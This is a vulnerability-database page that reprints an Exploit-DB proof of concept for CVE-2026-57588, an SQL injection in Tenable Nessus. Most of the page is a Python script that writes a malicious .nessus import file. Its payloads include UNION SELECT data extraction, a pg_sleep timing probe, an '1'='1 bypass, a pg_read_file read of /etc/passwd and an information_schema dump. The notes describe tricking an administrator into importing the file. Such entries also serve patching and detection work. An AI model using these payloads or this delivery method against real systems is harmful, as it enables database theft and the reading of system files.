Lucene search
K

Tenable Nessus 10.12.1 - SQL Injection

🗓️ 07 Jul 2026 00:00:00Reported by banyamerType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 9 Views

Nessus SQL injection via malicious import enables data exfiltration by users; fixed in 10.12.1.

Related
Code
ReporterTitlePublishedViews
Family
ATTACKERKB
CVE-2026-57588
25 Jun 202613:47
attackerkb
Circl
CVE-2026-57588
26 Jun 202614:40
circl
CVE
CVE-2026-57588
25 Jun 202613:47
cve
Cvelist
CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import
25 Jun 202613:47
cvelist
EUVD
EUVD-2026-39409
25 Jun 202613:47
euvd
Tenable Nessus
Tenable Nessus < 10.12.1 Multiple Vulnerabilities (TNS-2026-17)
26 Jun 202600:00
nessus
NVD
CVE-2026-57588
25 Jun 202615:16
nvd
Packet Storm
📄 Tenable Nessus 10.12.0 SQL Injection
7 Jul 202600:00
packetstorm
Positive Technologies
PT-2026-52459
25 Jun 202600:00
ptsecurity
Vulnrichment
CVE-2026-57588 SQL Injection in Nessus via Malicious Scan Result File Import
25 Jun 202613:47
vulnrichment
Rows per page
# Exploit Title:    Tenable Nessus 10.12.1 - SQL Injection 
# CVE:                  CVE-2026-57588
# Date:                 2026-06-26
# Exploit Author:       Mohammed Idrees Banyamer
# Author Country:       Jordan
# Instagram:            @banyamer_security
# Author GitHub:        https://github.com/mbanyamer
# Author Blog  :        https://banyamersecurity.com/blog/
# Vendor Homepage:      https://www.tenable.com
# Software Link:        https://www.tenable.com/downloads/nessus
# Affected:             Nessus 10.12.0 and prior
# Tested on:            Nessus 10.12.0
# Category:             Remote
# Platform:             Linux / Windows
# Exploit Type:         SQL Injection
# CVSS:                 4.3 (Medium)
# Description:          A SQL injection vulnerability exists in Tenable Nessus when importing malicious scan result files (.nessus XML). 
#                       Successful exploitation allows data exfiltration from the backend database by a privileged user.
# Fixed in:             Nessus 10.12.1 and later
# Usage:
#   python3 exploit.py -o malicious.nessus
#
# Examples:
#   python3 exploit.py
#   python3 exploit.py --output poc.nessus
#
# Options:
#   -o, --output     Output filename for the malicious .nessus file
#
# Notes:
#   • This is a Proof of Concept. Requires social engineering to trick a privileged user into importing the file.
#   • Works best against PostgreSQL backend (default in Nessus).
#
# How to Use
#
# Step 1:
#   Generate the malicious file using this script.
#
# Step 2:
#   Deliver the .nessus file to a Nessus administrator and have them import it via the web interface.

def banner():
    print(r"""
╔██████╗  █████╗ ███╗   ██╗██╗   ██╗ █████╗ ███╗   ███╗███████╗██████╗╗
║██╔══██╗██╔══██╗████╗  ██║╚██╗ ██╔╝██╔══██╗████╗ ████║██╔════╝██╔══██║
║██████╔╝███████║██╔██╗ ██║ ╚████╔╝ ███████║██╔████╔██║█████╗  ██████╔╝
║██╔══██╗██╔══██║██║╚██╗██║  ╚██╔╝  ██╔══██║██║╚██╔╝██║██╔══╝  ██╔══██╗
║██████╔╝██║  ██║██║ ╚████║   ██║   ██║  ██║██║ ╚═╝ ██║███████╗██║  ██║
╚═════╝ ╚═╝  ╚═╝╚═╝  ╚═══╝   ╚═╝   ╚═╝  ╚═╝╚═╝     ╚═╝╚══════╝╚═╝  ╚═╝
        ╔═╗ Banyamer Security ╔═╗
""")

import argparse
import xml.etree.ElementTree as ET

def create_malicious_nessus(output_file):
    root = ET.Element("NessusClientData_v2")
    report = ET.SubElement(root, "Report")
    report.set("name", "PoC - CVE-2026-57588")
    host = ET.SubElement(report, "ReportHost")
    host.set("name", "poc-target.example.com")
    host_properties = ET.SubElement(host, "HostProperties")
    tags = [
        ("hostname", "evil-host' UNION SELECT NULL, current_database(), version(), user() -- "),
        ("os", "Linux' AND (SELECT pg_sleep(5))=0 -- "),
        ("ip", "192.168.1.1' OR '1'='1"),
        ("fqdn", "test' ; SELECT pg_read_file('/etc/passwd') -- "),
    ]
    for name, value in tags:
        tag = ET.SubElement(host_properties, "tag")
        tag.set("name", name)
        tag.text = value
    item = ET.SubElement(host, "ReportItem")
    ET.SubElement(item, "pluginID").text = "999999"
    ET.SubElement(item, "pluginName").text = "CVE-2026-57588 PoC"
    ET.SubElement(item, "port").text = "0"
    ET.SubElement(item, "protocol").text = "tcp"
    ET.SubElement(item, "severity").text = "0"
    ET.SubElement(item, "description").text = "Proof of Concept for SQL Injection"
    plugin_output = ET.SubElement(item, "plugin_output")
    plugin_output.text = """Normal output
' UNION ALL SELECT 
    '=== DATA EXFIL START ===',
    table_name,
    column_name,
    '=== DATA EXFIL END ==='
FROM information_schema.columns 
WHERE table_schema = current_schema() -- """
    tree = ET.ElementTree(root)
    with open(output_file, "wb") as f:
        tree.write(f, encoding="utf-8", xml_declaration=True)
    print(f"[+] Malicious file successfully created: {output_file}")
    print("[+] Deliver this file to a privileged Nessus user for import.")

def main():
    banner()
    parser = argparse.ArgumentParser(description="CVE-2026-57588 Nessus SQLi PoC")
    parser.add_argument("-o", "--output", default="cve-2026-57588-poc.nessus", help="Output filename (default: cve-2026-57588-poc.nessus)")
    args = parser.parse_args()
    create_malicious_nessus(args.output)

if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

07 Jul 2026 00:00Current
5.9Medium risk
Vulners AI Score5.9
CVSS 3.13.3
CVSS 44.6
EPSS0.00158
SSVC
9